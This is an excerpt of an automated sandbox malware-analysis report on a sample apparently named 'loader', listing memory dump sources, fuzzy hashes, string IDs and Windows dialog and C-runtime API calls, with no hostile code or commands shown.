                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                    • Instruction ID: ae70cd5f467b0ea7c70267e036a7a2e166bc7fce21a5400be7973f9619fa2752
                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                    • Instruction Fuzzy Hash: E6021C71E002199BDF24CFA9C8806EDF7F2EF88315F258269D919EB384D731A945CB94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 1}$|l
                                                                                    • API String ID: 0-1419010634
                                                                                    • Opcode ID: ffa0c036d713dc18a97a5dbedc7ffccd13b6cf4cbfb8ad077499083fee2e192b
                                                                                    • Instruction ID: 3b9734fa61754524115d12970ede87a559b2fce5b19c059bf37a6d31b5aaa9bf
                                                                                    • Opcode Fuzzy Hash: ffa0c036d713dc18a97a5dbedc7ffccd13b6cf4cbfb8ad077499083fee2e192b
                                                                                    • Instruction Fuzzy Hash: 81812F6590EBC59FE743A7349C22A693F72EB53300B4A41EBE680CF3A3D5295C05C766
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gj
                                                                                    • API String ID: 0-4203073231
                                                                                    • Opcode ID: 3a15e851181cd43b9baf27bfc73dd15eac7fec35237897f5e792821dc264b989
                                                                                    • Instruction ID: b350440c9fd56456a05266f3a9c3de740d35ad563d6687f9384fb4b836308bb3
                                                                                    • Opcode Fuzzy Hash: 3a15e851181cd43b9baf27bfc73dd15eac7fec35237897f5e792821dc264b989
                                                                                    • Instruction Fuzzy Hash: 04C14772A183518FC754CF29D88065AFBE2BFC8308F19892DE998D7311D734E945CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: b=q=
                                                                                    • API String ID: 0-4069823217
                                                                                    • Opcode ID: f54519f03af771d81636df555f17e2543a1de43f2bf65402544a35e822ec2c78
                                                                                    • Instruction ID: 3bc8e4b23829a2d1b6e2f6a8eb06693cfcc1b367b851d2a3b36170029d7ddb14
                                                                                    • Opcode Fuzzy Hash: f54519f03af771d81636df555f17e2543a1de43f2bf65402544a35e822ec2c78
                                                                                    • Instruction Fuzzy Hash: 7D314831949396AFCB328E3848612C7BFF2AF562013E559AFC5C08B406D72154C7DB86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: l
                                                                                    • API String ID: 0-2517025534
                                                                                    • Opcode ID: 5298b7296597d913b94853d1597a335bc5da78f82c0c0e2e605c8ac517fd4148
                                                                                    • Instruction ID: cf127ac3395ce7da97f736f2c05fdb23177246ed41e4d0625e8fa2cff7f1c0a7
                                                                                    • Opcode Fuzzy Hash: 5298b7296597d913b94853d1597a335bc5da78f82c0c0e2e605c8ac517fd4148
                                                                                    • Instruction Fuzzy Hash: 0B0101A290E3C09FD303977498A66413FB19E17100B1F88C7C4C4CF4A3D129192EE763
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                    • Instruction ID: d66a4a15054aca663cf27de2c8e80915af6ed2c3538f19092abb0c0d2b363e82
                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                    • Instruction Fuzzy Hash: A462C8716047859FCB25CF28C4906F9BBE2AF96304F08C96DE8DA8B346D734E945CB16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                    • Instruction ID: a319e51468cf0ec40d29644957148b28cda057b2e1607cb73c9151e6e86b7343
                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                    • Instruction Fuzzy Hash: C062D87160C3858FCB15CF28C8909B9BBE2BF95304F1889ADEC9A8B746D730E945CB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c3d54a3819823660fb0626777f5ea2d30eaadda5a2d6ab7c13f77ff4355e5187
                                                                                    • Instruction ID: 57c6019ed9dd6e526ad3355340f3f82e5f80d688979b8457157b3c336649ea50
                                                                                    • Opcode Fuzzy Hash: c3d54a3819823660fb0626777f5ea2d30eaadda5a2d6ab7c13f77ff4355e5187
                                                                                    • Instruction Fuzzy Hash: 7EF1E05980D3C06FCB034BB15E665A63F739A1320575E89CBC8C18EAA3D485AE0BE756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a1e5ada8c23a19605686052367fa2865b8a07688fe5a1d127909fe771fb5587
                                                                                    • Instruction ID: ed7962860c6a7d977edb61261f51dbccbfa9551d9d3abe68a64ba29f6011db35
                                                                                    • Opcode Fuzzy Hash: 7a1e5ada8c23a19605686052367fa2865b8a07688fe5a1d127909fe771fb5587
                                                                                    • Instruction Fuzzy Hash: A8523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d982502ff4c5b4969416cce246e970d549cb67aaa01c99f968741538e50b7939
                                                                                    • Instruction ID: f3faa7536bb2e36a2dea9b06097b07750e5063d156e2751d8c4e6f264de0771f
                                                                                    • Opcode Fuzzy Hash: d982502ff4c5b4969416cce246e970d549cb67aaa01c99f968741538e50b7939
                                                                                    • Instruction Fuzzy Hash: E912D3B16187068FC728CF28C490AB9B7E2FF94304F14892EE996C7780E774E995CB45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d6821259e2e7f26aad5288d563faf2c9564d9afcbec4fe213cb452a37eb6fe5a
                                                                                    • Instruction ID: f16a6bfa06e743f7327c370ce8577b6d0864674908dd032a3ec016e31815f46a
                                                                                    • Opcode Fuzzy Hash: d6821259e2e7f26aad5288d563faf2c9564d9afcbec4fe213cb452a37eb6fe5a
                                                                                    • Instruction Fuzzy Hash: 30F19D716083018FC758CF29C58466ABBE6EFCA324F154A2EF4C5E7395D630E945CB86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: edbfdad44325fd09a1db7f793252c8a86e769c74b33f642b1a93ae2cbf004a94
                                                                                    • Instruction ID: 26b57ce09c38663a0a669cc1c5e1e1b81aab896d497dd6d1dc961469b8b22ac7
                                                                                    • Opcode Fuzzy Hash: edbfdad44325fd09a1db7f793252c8a86e769c74b33f642b1a93ae2cbf004a94
                                                                                    • Instruction Fuzzy Hash: 26B1A11584EBC98FCB128B70896B556BFB25D0360074EDADFC8C58B9A7D204BC0BA753
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: a78968490406cf0f7c3b7f15faaf16f3f44976f4236a69571d2d170a545ea94c
                                                                                    • Instruction ID: e306f457fe57d25dd0a208af1da17aa0ce9df74b427e1c537b391391c72b2726
                                                                                    • Opcode Fuzzy Hash: a78968490406cf0f7c3b7f15faaf16f3f44976f4236a69571d2d170a545ea94c
                                                                                    • Instruction Fuzzy Hash: F3D196B1A083458FDB14DF28C84479BBBE2BF89708F04456DF8859B342D774E949CB5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ba6607d86ad66757135bc19b32e42856b1c66e1c5db48918592d5fadd4d40f41
                                                                                    • Instruction ID: c358a6daef4d51ed22b7998d3d1c3bee731a51db023eff9af7604cfd7edf8a7f
                                                                                    • Opcode Fuzzy Hash: ba6607d86ad66757135bc19b32e42856b1c66e1c5db48918592d5fadd4d40f41
                                                                                    • Instruction Fuzzy Hash: D1E16E755183908FC304CF29D88046ABFF1AF9A300F450A5EF9CA97352C335E959DBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bdd905523024b1a81dffebe9362614b7b3c72694795fef4592432a912841a325
                                                                                    • Instruction ID: 6d6f9717bd132cfacf2345687153d64c3e7871eae9f15ba8de0ac85965c2ba2c
                                                                                    • Opcode Fuzzy Hash: bdd905523024b1a81dffebe9362614b7b3c72694795fef4592432a912841a325
                                                                                    • Instruction Fuzzy Hash: 189146B02003499BDB24EFA4D892BFA77D7EBA0304F10092DF99687382DE749645D796
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3112bff31575a83f01863fda650d4ddf0d33e6faf59d17beb6bbfc348506c3e4
                                                                                    • Instruction ID: 12d90e1049b824a121b7143299c3092e1e902be245591ed0ac7f42301612f8fd
                                                                                    • Opcode Fuzzy Hash: 3112bff31575a83f01863fda650d4ddf0d33e6faf59d17beb6bbfc348506c3e4
                                                                                    • Instruction Fuzzy Hash: 18B13E31610609DFD715CF28C486BA97BE1FF46365F298658E899CF3A1C339D992CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                    • Instruction ID: a12e59b287ef53bd733cec44a302e3809db94bc47de63178c79a7f839686a553
                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                    • Instruction Fuzzy Hash: 3B812A717043464BEF28DE68C8D2BBD77D7EB91304F00092DE9C68B282DE748986C756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1da6095977aca77bd2dbeee5cafb216a83025cbb48bb6a8820e46f2981fb5bba
                                                                                    • Instruction ID: dd461f3c2b9f9f92b0306cf293910b0963a77f3d1e36eaa28e016dd8a15d0871
                                                                                    • Opcode Fuzzy Hash: 1da6095977aca77bd2dbeee5cafb216a83025cbb48bb6a8820e46f2981fb5bba
                                                                                    • Instruction Fuzzy Hash: AE614631A10F0956DA389A6898BD7FE2397EB01343F14051EEC87DF381E691DE8E8715
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                    • Instruction ID: 95638f482e7f2c3fae9a88f109afed20ac405d086001fc93b09320c8b5e4e956
                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                    • Instruction Fuzzy Hash: FA513570200E4557DB74556884BEBFF67D79B5230BF18085AEC83CB382CA05AD8E8396
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c28ffcec8f2e53bbe991ded8c2dc418df6520a3de38b5081a879aecabca425a3
                                                                                    • Instruction ID: 3b1f6743c394aa3fc5802f77949fc75730ae0c9b42fbfab9a98173913d76f6f8
                                                                                    • Opcode Fuzzy Hash: c28ffcec8f2e53bbe991ded8c2dc418df6520a3de38b5081a879aecabca425a3
                                                                                    • Instruction Fuzzy Hash: 27815D76D0122A8FCFA5DF25CD886A9B7B5AF44701F5681DADC0AB3250EB315E85CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42d54af0fbed653634bf9021618caea234602afc6b75b0153fbb4b46d4c22a94
                                                                                    • Instruction ID: c8bb727a293c23f69e4de50643553fe2ddd5dc986fc501b842b1e242c9b9ec0e
                                                                                    • Opcode Fuzzy Hash: 42d54af0fbed653634bf9021618caea234602afc6b75b0153fbb4b46d4c22a94
                                                                                    • Instruction Fuzzy Hash: BF615E75D0122A9FCFA59F29CC886D9B7B5BF44311F1282D9D84EA3250EB309E85DF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c94adf60d45b9d667e809d5343a1d511604f02beb80f3b174c4725e45c499bb7
                                                                                    • Instruction ID: d66a0c4be01df5a1e70017ffad08059680699fd4bd77e621a1a5834e75ec4ba8
                                                                                    • Opcode Fuzzy Hash: c94adf60d45b9d667e809d5343a1d511604f02beb80f3b174c4725e45c499bb7
                                                                                    • Instruction Fuzzy Hash: 0F51D5359083D58FD711CF38D5504AEBFE2AE9A314F4909ADE4D95B343C221DA4ACBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3950f36532a62692ed512f336a9ae1aa589cd57bf653e38fa9e6be0a6e778e26
                                                                                    • Instruction ID: 07b648d98a2207eb03c65a428fc6d60881e16885eb6059660171a84793dd2f56
                                                                                    • Opcode Fuzzy Hash: 3950f36532a62692ed512f336a9ae1aa589cd57bf653e38fa9e6be0a6e778e26
                                                                                    • Instruction Fuzzy Hash: 295190B19006198FEB24CF98E9817EABBF6FB48314F24993AD401EB350D375D905CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c27b04208c503ae81dc6656f218db141cc39ea20f607b1605b2f698e5ae3e54a
                                                                                    • Instruction ID: 8a1f9b47af610fec543594c217b563069e6816c035d2be11bc3eb981b4bf6337
                                                                                    • Opcode Fuzzy Hash: c27b04208c503ae81dc6656f218db141cc39ea20f607b1605b2f698e5ae3e54a
                                                                                    • Instruction Fuzzy Hash: CB51DFB1A087119FC748CF19D88055AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                    • Instruction ID: 8db51d4d33ff8169978aa15ccbf6a6024a07d8682549f7ffb57504781d3fc5e7
                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                    • Instruction Fuzzy Hash: B6314AB1A047568FCB54DF28C8512AEBBE1FB95304F10492DE4C5C7742C734EA0ACB92
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0064C2B1
                                                                                    • EndDialog.USER32(?,00000006), ref: 0064C2C4
                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0064C2E0
                                                                                    • SetFocus.USER32(00000000), ref: 0064C2E7
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0064C321
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0064C358
                                                                                    • _swprintf.LIBCMT ref: 0064C404
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0064C417
                                                                                    • _swprintf.LIBCMT ref: 0064C477
                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0064C48A
                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0064C4A7
                                                                                    • _swprintf.LIBCMT ref: 0064C535
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0064C548
                                                                                    • _swprintf.LIBCMT ref: 0064C59C
                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0064C5AF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow__vswprintf_c_l
                                                                                    • String ID: %s %s$%s %s %s$Pd$REPLACEFILEDLG
                                                                                    • API String ID: 902387417-3312844388
                                                                                    • Opcode ID: ce115b4c90bd33aa12df9269a145852656f0fb165597cbd83069bdc9382e4ae5
                                                                                    • Instruction ID: 6585643879c43a1bfa95a6951fc728a591059072d0dea342f1ccaefcd7b82055
                                                                                    • Opcode Fuzzy Hash: ce115b4c90bd33aa12df9269a145852656f0fb165597cbd83069bdc9382e4ae5
                                                                                    • Instruction Fuzzy Hash: F591A572248354BBD361DBA0CC49FFB77AEEB8A714F004819F649D6291D7B1EB048762
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0063E30E
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • _strlen.LIBCMT ref: 0063E32F
                                                                                    • SetDlgItemTextW.USER32(?,0066E274,?), ref: 0063E38F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0063E3C9
                                                                                    • GetClientRect.USER32(?,?), ref: 0063E3D5
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063E475
                                                                                    • GetWindowRect.USER32(?,?), ref: 0063E4A2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0063E4DB
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0063E4E3
                                                                                    • GetWindow.USER32(?,00000005), ref: 0063E4EE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0063E51B
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0063E58D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ClientItemLongMetricsSystem__vswprintf_c_l_strlen_swprintf
                                                                                    • String ID: $%s:$CAPTION$d
                                                                                    • API String ID: 1562912926-2512411981
                                                                                    • Opcode ID: 3eed607ab324fd27668408b8e752674d086ecb72864452cb66eaabd245274f99
                                                                                    • Instruction ID: 1b8ac89b3d60a926e714cb069f1a57bfe42f5479099213581bffd34f617d4c48
                                                                                    • Opcode Fuzzy Hash: 3eed607ab324fd27668408b8e752674d086ecb72864452cb66eaabd245274f99
                                                                                    • Instruction Fuzzy Hash: 0781A271208311AFD710DFA8CC89A6FBBEAEFC8714F04191DFA84D7291D671E9058B62
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0065CB66
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C71E
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C730
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C742
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C754
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C766
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C778
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C78A
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C79C
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7AE
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7C0
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7D2
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7E4
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7F6
                                                                                    • _free.LIBCMT ref: 0065CB5B
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 0065CB7D
                                                                                    • _free.LIBCMT ref: 0065CB92
                                                                                    • _free.LIBCMT ref: 0065CB9D
                                                                                    • _free.LIBCMT ref: 0065CBBF
                                                                                    • _free.LIBCMT ref: 0065CBD2
                                                                                    • _free.LIBCMT ref: 0065CBE0
                                                                                    • _free.LIBCMT ref: 0065CBEB
                                                                                    • _free.LIBCMT ref: 0065CC23
                                                                                    • _free.LIBCMT ref: 0065CC2A
                                                                                    • _free.LIBCMT ref: 0065CC47
                                                                                    • _free.LIBCMT ref: 0065CC5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
